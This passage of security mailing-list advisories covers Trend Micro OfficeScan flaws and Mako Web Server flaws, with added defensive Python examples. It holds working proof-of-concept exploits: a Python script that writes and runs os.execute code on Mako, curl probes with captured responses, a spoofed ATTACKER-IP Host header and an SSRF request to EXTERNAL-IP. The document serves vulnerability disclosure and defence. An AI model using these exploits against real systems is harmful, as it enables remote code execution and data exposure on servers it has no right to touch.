curl_setopt($this->_objcurlHandle, CURLOPT_FOLLOWLOCATION,false);
curl_setopt($this->_objcurlHandle, CURLOPT_RETURNTRANSFER,true);
curl_setopt($this->_objcurlHandle, CURLOPT_HEADER, true);
curl_setopt($this->_objcurlHandle, CURLOPT_SSL_VERIFYHOST, 0);  // <===  HERE
curl_setopt($this->_objcurlHandle, CURLOPT_SSL_VERIFYPEER, 0);  // <===  THERE
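As an added example (not from the advisory or Trend Micro's code), a small Python check that scans PHP source for curl_setopt() calls that weaken peer or host verification; it is run here over the snippet quoted above and over a hardened variant constructed for contrast, whose CA bundle path is a placeholder.

```python
import re

# Matches curl_setopt(<handle>, CURLOPT_SSL_VERIFYPEER|CURLOPT_SSL_VERIFYHOST, <value>);
# the handle is matched loosely so $ch and $this->_objcurlHandle both work.
SETOPT_RE = re.compile(
    r"curl_setopt\s*\(\s*[^,]+,\s*(CURLOPT_SSL_VERIFY(?:PEER|HOST))\s*,\s*([^)]+?)\s*\)",
    re.IGNORECASE,
)

# Values that weaken each check. For VERIFYHOST only 2 is correct: 0 disables the
# check and 1 was historically a weaker mode that only tested for a CN's presence.
UNSAFE_VALUES = {
    "CURLOPT_SSL_VERIFYPEER": {"0", "false"},
    "CURLOPT_SSL_VERIFYHOST": {"0", "1", "false"},
}

def find_disabled_tls_checks(php_source):
    """Return (line_number, option, value) for every call that weakens TLS verification."""
    findings = []
    for lineno, line in enumerate(php_source.splitlines(), start=1):
        for match in SETOPT_RE.finditer(line):
            option, value = match.group(1).upper(), match.group(2).strip()
            if value.lower() in UNSAFE_VALUES[option]:
                findings.append((lineno, option, value))
    return findings

# The HttpTalk.php lines quoted in the advisory.
VULNERABLE_SNIPPET = """\
curl_setopt($this->_objcurlHandle, CURLOPT_FOLLOWLOCATION,false);
curl_setopt($this->_objcurlHandle, CURLOPT_RETURNTRANSFER,true);
curl_setopt($this->_objcurlHandle, CURLOPT_HEADER, true);
curl_setopt($this->_objcurlHandle, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($this->_objcurlHandle, CURLOPT_SSL_VERIFYPEER, 0);
"""

# A hardened variant constructed for contrast (not vendor code): verify the peer,
# require the hostname to match, and pin an explicit CA bundle (path is a placeholder).
HARDENED_SNIPPET = """\
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt($ch, CURLOPT_CAINFO, '/path/to/trusted-ca-bundle.pem');
"""

if __name__ == "__main__":
    for lineno, option, value in find_disabled_tls_checks(VULNERABLE_SNIPPET):
        print(f"line {lineno}: {option} = {value} weakens TLS verification")
    print("hardened snippet findings:", find_disabled_tls_checks(HARDENED_SNIPPET))
```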



Network Access:
===
Remote



Severity:
=
High



Disclosure Timeline:
=
Vendor Notification: May 31, 2017
Vendor releases fixes / advisory : September 27, 2017
September 28, 2017 : Public Disclosure




hyp3rlinx



[FD] Trend Micro OfficeScan v11.0 and XG (12.0)* Host Header Injection CVE-2017-14087

2017-09-29 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)  
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/CVE-2017-14087-TRENDMICRO-OFFICESCAN-XG-HOST-HEADER-INJECTION.txt
[+] ISR: ApparitionSec



Vendor:
==
www.trendmicro.com



Product:

OfficeScan
v11.0 and XG (12.0)*


OfficeScan protects enterprise networks from malware, network viruses,
web-based threats, spyware, and mixed threat attacks.
An integrated solution, OfficeScan consists of the OfficeScan agent
program that resides at the endpoint and a server program that
manages all agents. The OfficeScan agent guards the endpoint and
reports its security status to the server. The server, through the
web-based management console, makes it easy to set coordinated
security policies and deploy updates to every agent.



Vulnerability Type:
===
Host Header Injection



CVE Reference:
==
CVE-2017-14087



Security Issue:

Host header injection issue: "db_controller.php" relies on
$_SERVER['HTTP_HOST'], which can be spoofed by the client, instead of
$_SERVER['SERVER_NAME'].
In environments where caching is in place, an HTTP GET request with a
poisoned Host header can cause web pages to render arbitrary links that
point to a malicious website.


Exploit/POC:
=

c:\> CURL http://x.x.x.x -H "Host: ATTACKER-IP"
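As an added example (constructed here, not code from db_controller.php), a Python helper showing the safe alternative to trusting HTTP_HOST: the host used in generated links is taken from a server-side allowlist, and a spoofed Host header like the one in the PoC is rejected. The host names and request dictionaries are constructed sample data.

```python
from urllib.parse import urlsplit

def canonical_host(environ, allowed_hosts, default_port=80):
    """Return the host (with port if non-default) to use in generated links, or None
    when the client-supplied Host header does not name this server.

    environ is a WSGI-style mapping. HTTP_HOST is the raw Host header and is untrusted;
    the allowlist is server-side configuration, which is what links must be built from.
    """
    allowed = {h.lower() for h in allowed_hosts}
    # urlsplit parses "host", "host:port" and "[ipv6]:port" forms uniformly.
    parsed = urlsplit("//" + environ.get("HTTP_HOST", ""))
    try:
        hostname, port = parsed.hostname, parsed.port or default_port
    except ValueError:            # e.g. "Host: server:abc" with a non-numeric port
        return None
    if hostname is None or hostname not in allowed:
        return None
    return hostname if port == default_port else f"{hostname}:{port}"

def absolute_link(environ, allowed_hosts, path):
    """Build an absolute URL without ever echoing an unrecognized Host header back."""
    host = canonical_host(environ, allowed_hosts)
    if host is None:
        # Fall back to the configured name. SERVER_NAME is only trustworthy when the
        # web server is configured to use its canonical name, not the request's Host.
        host = environ["SERVER_NAME"]
    return f"http://{host}{path}"

# Constructed requests: a legitimate one and one carrying the spoofed Host from the PoC.
ALLOWED_HOSTS = {"officescan.example.internal", "10.0.0.5"}
LEGIT_REQUEST = {"SERVER_NAME": "officescan.example.internal",
                 "HTTP_HOST": "officescan.example.internal"}
SPOOFED_REQUEST = {"SERVER_NAME": "officescan.example.internal",
                   "HTTP_HOST": "ATTACKER-IP"}

if __name__ == "__main__":
    print(absolute_link(LEGIT_REQUEST, ALLOWED_HOSTS, "/db_controller.php"))
    print(absolute_link(SPOOFED_REQUEST, ALLOWED_HOSTS, "/db_controller.php"))
```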



Network Access:
===
Remote




Severity:
=
Medium



Disclosure Timeline:
==
Vendor Notification:  June 2, 2017
Vendor releases fixes / advisory : September 27, 2017
September 28, 2017 : Public Disclosure




hyp3rlinx



[FD] Trend Micro OfficeScan v11.0 and XG (12.0)* Unauthorized NT Domain / PHP Information Disclosures CVE-2017-14085

2017-09-29 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:  
http://hyp3rlinx.altervista.org/advisories/CVE-2017-14085-TRENDMICRO-OFFICESCAN-XG-REMOTE-NT-DOMAIN-PHP-INFO-DISCLOSURE.txt
[+] ISR: ApparitionSec



Vendor:
==
www.trendmicro.com



Product:
===
OfficeScan
v11.0 and XG (12.0)*


Vulnerability Type:
===
Unauthorized NT Domain Disclosure
Unauthorized PHP Information Disclosure

OfficeScan protects enterprise networks from malware, network viruses,
web-based threats, spyware, and mixed threat attacks.
An integrated solution, OfficeScan consists of the OfficeScan agent
program that resides at the endpoint and a server program that
manages all agents. The OfficeScan agent guards the endpoint and
reports its security status to the server. The server, through the
web-based management console, makes it easy to set coordinated
security policies and deploy updates to every agent.



CVE Reference:
==
CVE-2017-14085



Security Issue(s):

( NT Domain Disclosure )
Remote unauthenticated attackers who can reach the Trend Micro OfficeScan
XG application can query the network's NT domains.
NT domain enumeration is leaked by the web interface when it should not be.
Normally this information is obtained with NET commands, so while the
enumeration is not high in severity, the interface should not return it,
especially to unauthorized users, as it can aid in launching further
attacks.


( PHP Information Disclosure )
Remote unauthenticated attackers that can connect to the Trend Micro
OfficeScan XG application can query the PHP version and loaded modules.

In 'analyzeWF.php' we see get_loaded_extensions() and phpversion()
calls, but no session or authentication check is made.

$strAnalyzeResultHeader .= analyzeWFShowItemInfo('Current PHP version: '.phpversion());
$strAnalyzeResultHeader .= analyzeWFShowItemInfo('PHP extensions: '.implode(', ',get_loaded_extensions()));
$strAnalyzeResultHeader .= analyzeWFShowItemInfo('WGF version : '.$strVersion);

etc...


References:
===
https://success.trendmicro.com/solution/1118372



Exploit/POC (NT Domain Disclosure):
=
[root@localhost /]# curl -v -k https://VICTIM-IP:4343/officescan/console/RemoteInstallCGI/cgiGetNTDomain.exe
* About to connect() to VICTIM-IP port 4343
*   Trying VICTIM-IP... connected


< HTTP/1.1 200 OK
< Pragma: no-cache
< Content-Type: text/plain;charset=utf-8
< Server: Microsoft-IIS/7.5
< X-Powered-By: ASP.NET
< Date: Thu, 01 Jun 2017 15:27:27 GMT
< Connection: close
< Content-Length: 510
{
   "ERROR" : {
  "ERROR_CODE" : 0
   },
   "RESPONSE" : {
  "NODES" : [
 {
"NAME" : "Avaya"
 },
 {
"NAME" : "Km-netprinters"
 },
 {
"NAME" : "Mshome"
 },
 {
"NAME" : "Printserver"
 },
 {
"NAME" : "MyDomain"
 },
 {
"NAME" : "Workgroup"
 },
 {
"NAME" : "Xpemb"
 }
  ]
   }
}


Exploit / POC (PHP Information Disclosure):

c:\> curl -k https://VICTIM-IP:4343/officescan/console/html/widget/repository/widgetPool/wp1/interface/analyzeWF.php

HTTP/1.1 200 OK

[INI_UPDATE_SECTION]

>>>> Start Anaylze WGF : 2017-06-02 15:58:26
[INFO] Current PHP version: 7.0.6
[INFO] PHP extensions: Core, bcmath, calendar, ctype, date, filter,
hash, iconv, json, mcrypt, SPL, pcre, Reflection, session, standard,
mysqlnd, tokenizer, zip, zlib, libxml, dom, PDO, openssl, SimpleXML,
xml, wddx, xmlreader, xmlwriter, cgi-fcgi, curl, gmp, ldap, mbstring,
Phar, pdo_sqlite, soap, com_dotnet
[INFO] WGF version : 3.8
[INFO] WGF current wp in /path/to/widgetPool/config.php : wp2
[INFO] WGF is /path/to/widgets_new exists : true
[ERROR] C:\Windows\TEMP check read/write permissions : failed
To solved this problem please reference document here.

etc...
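As an added detection example (not part of the advisory), a Python parser for IIS W3C extended logs that flags successful anonymous requests to the two unauthenticated endpoints shown above. The log lines, client addresses and the benign third path are constructed for this example.

```python
from urllib.parse import unquote

# Endpoints named in the advisory, lower-cased because IIS paths are case-insensitive.
SENSITIVE_PATHS = {
    "/officescan/console/remoteinstallcgi/cgigetntdomain.exe",
    "/officescan/console/html/widget/repository/widgetpool/wp1/interface/analyzewf.php",
}

def parse_w3c(log_text):
    """Yield one dict per request line, naming columns from the #Fields: directive."""
    fields = None
    for raw in log_text.splitlines():
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]          # column names follow the directive
        elif raw.startswith("#") or not raw.strip() or fields is None:
            continue
        else:
            values = raw.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))

def unauthenticated_probe_hits(log_text):
    """Return (client_ip, path, status) for successful anonymous hits on sensitive paths.

    The path is percent-decoded and lower-cased before matching so encoded or
    differently-cased variants are still caught; '-' in cs-username means IIS
    associated no authenticated user with the request.
    """
    hits = []
    for rec in parse_w3c(log_text):
        path = unquote(rec.get("cs-uri-stem", "")).lower()
        anonymous = rec.get("cs-username", "-") == "-"
        if path in SENSITIVE_PATHS and rec.get("sc-status") == "200" and anonymous:
            hits.append((rec.get("c-ip"), path, rec["sc-status"]))
    return hits

# Constructed sample in IIS W3C extended format (not a real capture). IIS writes '+'
# for spaces inside the User-Agent, so whitespace splitting is safe.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2017-06-01 15:27:27 10.0.0.5 GET /officescan/console/RemoteInstallCGI/cgiGetNTDomain.exe - 4343 - 203.0.113.7 curl/7.29.0 200
2017-06-01 15:27:40 10.0.0.5 GET /officescan/console/html/widget/repository/widgetPool/wp1/interface/analyzeWF.php - 4343 - 203.0.113.7 curl/7.29.0 200
2017-06-01 15:28:02 10.0.0.5 GET /officescan/console/html/example-page.html - 4343 admin 10.0.0.9 Mozilla/5.0+(Windows+NT+6.1) 200
2017-06-01 15:28:10 10.0.0.5 GET /officescan/console/RemoteInstallCGI/cgiGetNTDomain.exe - 4343 - 198.51.100.4 curl/7.29.0 403
"""

if __name__ == "__main__":
    for ip, path, status in unauthenticated_probe_hits(SAMPLE_LOG):
        print(f"{ip} fetched {path} anonymously (HTTP {status})")
```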



Network Access:
===
Remote




Severity:
=
Medium



Disclosure Timeline:
=
Vendor Notification:  June 2, 2017
Vendor releases fixes / advisory : September 27, 2017
September 28, 2017  : Public Disclosure




[FD] Mako Web Server v2.5 Multiple Unauthenticated Vulnerabilities

2017-09-15 Thread hyp3rlinx
[+] SSD Beyond Security:
https://blogs.securiteam.com/index.php/archives/3391
[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MAKO-WEB-SERVER-MULTIPLE-UNAUTHENTICATED-VULNERABILIITIES-SECURITEAM.txt
[+] ISR: ApparitionSec


Vulnerabilities Summary
The following advisory describes three (3) vulnerabilities found in Mako
Server's tutorial page.

The vulnerabilities found are:

Unauthenticated Arbitrary File Write vulnerability that leads to Remote
Command Execution
Unauthenticated File Disclosure
Unauthenticated Server Side Request Forgery
As these tutorials may be used as the basis for production code, it is
important for users to be aware of these issues.

“As a compact application and web server, the Mako Server helps developers
rapidly design secure IoT and web applications. The Mako Server provides
an application server environment from which developers can design and
implement complete, custom solutions. The Mako Web Server is ideal for
embedded Linux systems.”

Credit
An independent security researcher, John Page AKA hyp3rlinx, has reported
this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program

Vendor response

RealTimeLogic was informed of the vulnerability on Aug 13, but while
acknowledging the receipt of the vulnerability information, refused to
respond to the technical claims, to give a fix timeline or coordinate an
advisory, saying:

“I just sent a formal notification for the commercial license requirement
and also we need to put a maintenance contract in place.
Internally I need to set-up a cost allocation account for billing against
these support inquiries.”

At this time it’s unclear whether these vulnerabilities are going to be
fixed and further attempts to get a status clarification failed.


Vulnerabilities details

Unauthenticated Arbitrary File Write vulnerability that leads to Remote
Command Execution:

The Mako web server tutorial does not sufficiently sanitize HTTP PUT
requests: when an attacker sends an HTTP PUT request to the 'save.lsp' web
page, the input is passed to a function responsible for accessing the
filesystem.

The attacker's input is saved on the victim's machine and can be executed
by sending an HTTP GET request to 'manage.lsp'.


HTTP PUT  'http://VICTIM-IP/examples/save.lsp?ex=2.1'
HTTP GET  'http://VICTIM-IP/examples/manage.lsp?execute=true=2.1=lua'


Proof of Concept


import urllib2,time

#MakoServer v2.5 Remote Command Execution 0day
#Credits: John Page AKA hyp3rlinx
#=

print  'MakoServer v2.5 Remote Command Execution'

CMD="os.execute('c:/Windows/system32/calc.exe')"

opener = urllib2.build_opener(urllib2.HTTPHandler)
request = urllib2.Request('http://IP/examples/save.lsp?ex=2.1', data=CMD)
request.add_header('Content-Type', 'text/plain;charset=UTF-8')
request.add_header('X-Requested-With', 'XMLHttpRequest')
request.add_header('Referer', 'http://localhost/Lua-Types.lsp')
request.get_method = lambda: 'PUT'
opener.open(request)

time.sleep(1)

urllib2.urlopen('http://IP/examples/manage.lsp?execute=true=2.1=lua')



Unauthenticated File Disclosure

The Mako web server tutorial does not sufficiently sanitize GET requests:
when an attacker sends a GET request to the URI IP/fs/../.., the input is
passed through without modification and a response containing the file's
content is returned.

Proof of Concept
The following GET request will respond with the C/Windows/system.ini
content:

curl -v http://VICTIM-IP/fs/C/Windows/system.ini

* About to connect() to VICTIM-IP port 80
*   Trying VICTIM-IP... connected
* Connected to VICTIM-IP (VICTIM-IP) port 80
> GET /fs/C/Windows/system.ini HTTP/1.1
> User-Agent: curl/7.15.5 (x86_64-redhat-linux-gnu) libcurl/7.15.5
OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5
> Host: VICTIM-IP
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Mon, 07 Aug 2017 22:21:27 GMT
< Server: MakoServer.net
< Content-Type: application/octet-stream
< Accept-Ranges: bytes
< Etag: 58b4be20
< Last-Modified: Tue, 28 Feb 2017 00:02:40 GMT
< Content-Length: 219
< Keep-Alive: Keep-Alive
; for 16-bit app support
[386Enh]
woafont=dosapp.fon
EGA80WOA.FON=EGA80WOA.FON
EGA40WOA.FON=EGA40WOA.FON
CGA80WOA.FON=CGA80WOA.FON
CGA40WOA.FON=CGA40WOA.FON

[drivers]
wave=mmdrv.dll
timer=timer.drv

[mci]
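As an added example, not Mako Server code, a Python check of the kind the /fs/ handler lacks: it decodes the requested path, normalizes it and refuses anything that resolves outside a dedicated served directory, so the dot-dot form described above is rejected and a request such as C/Windows/system.ini can only ever land inside that directory. The served root is a constructed placeholder.

```python
import posixpath
from urllib.parse import unquote

def resolve_under_root(root, requested):
    """Map a client-supplied path to a file below root, or return None if it escapes.

    root is an absolute POSIX-style directory (the folder the handler is meant to
    serve); requested is the part of the URL after the handler prefix, e.g. after
    "/fs/". Pure string logic, so it behaves the same everywhere and needs no disk.
    """
    # Undo percent-encoding so %2e%2e is seen as "..", and treat backslashes as
    # separators because Windows servers accept both.
    path = unquote(requested).replace("\\", "/")
    # A leading slash or a drive letter ("C:") is never a relative name below root.
    if path.startswith("/") or (len(path) > 1 and path[1] == ":"):
        return None
    root = posixpath.normpath(root)
    prefix = root if root.endswith("/") else root + "/"
    candidate = posixpath.normpath(posixpath.join(root, path))
    # After collapsing "." and ".." the result must still lie strictly below root.
    if candidate == root or not candidate.startswith(prefix):
        return None
    return candidate

if __name__ == "__main__":
    served_root = "/srv/mako/examples/public"       # placeholder directory
    for req in ("images/logo.png", "../../etc/passwd", "%2e%2e/%2e%2e/etc/passwd",
                "..\\..\\Windows\\system.ini", "C:/Windows/system.ini",
                "C/Windows/system.ini"):
        print(f"{req!r:36} -> {resolve_under_root(served_root, req)}")
```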


Server Side Request Forgery

The Mako web server tutorial does not sufficiently sanitize incoming POST
requests: when an attacker sends a POST request to the
'rtl/appmgr/new-application.lsp' URI, the input is executed and the server
connects to the attacker's machine.

Proof of Concept
Start Wireshark to see successful connections made from Mako Web Server
victim machine.

Initiate requests from another machine using CURL:

curl -v -X POST http://VICTIM-IP/rtl/appmgr/new-application.lsp -d io=net
-d path=http://EXTERNAL-IP



Network Access:
===
Remote



Severity:
=
High



Disclosure Timeline:
=
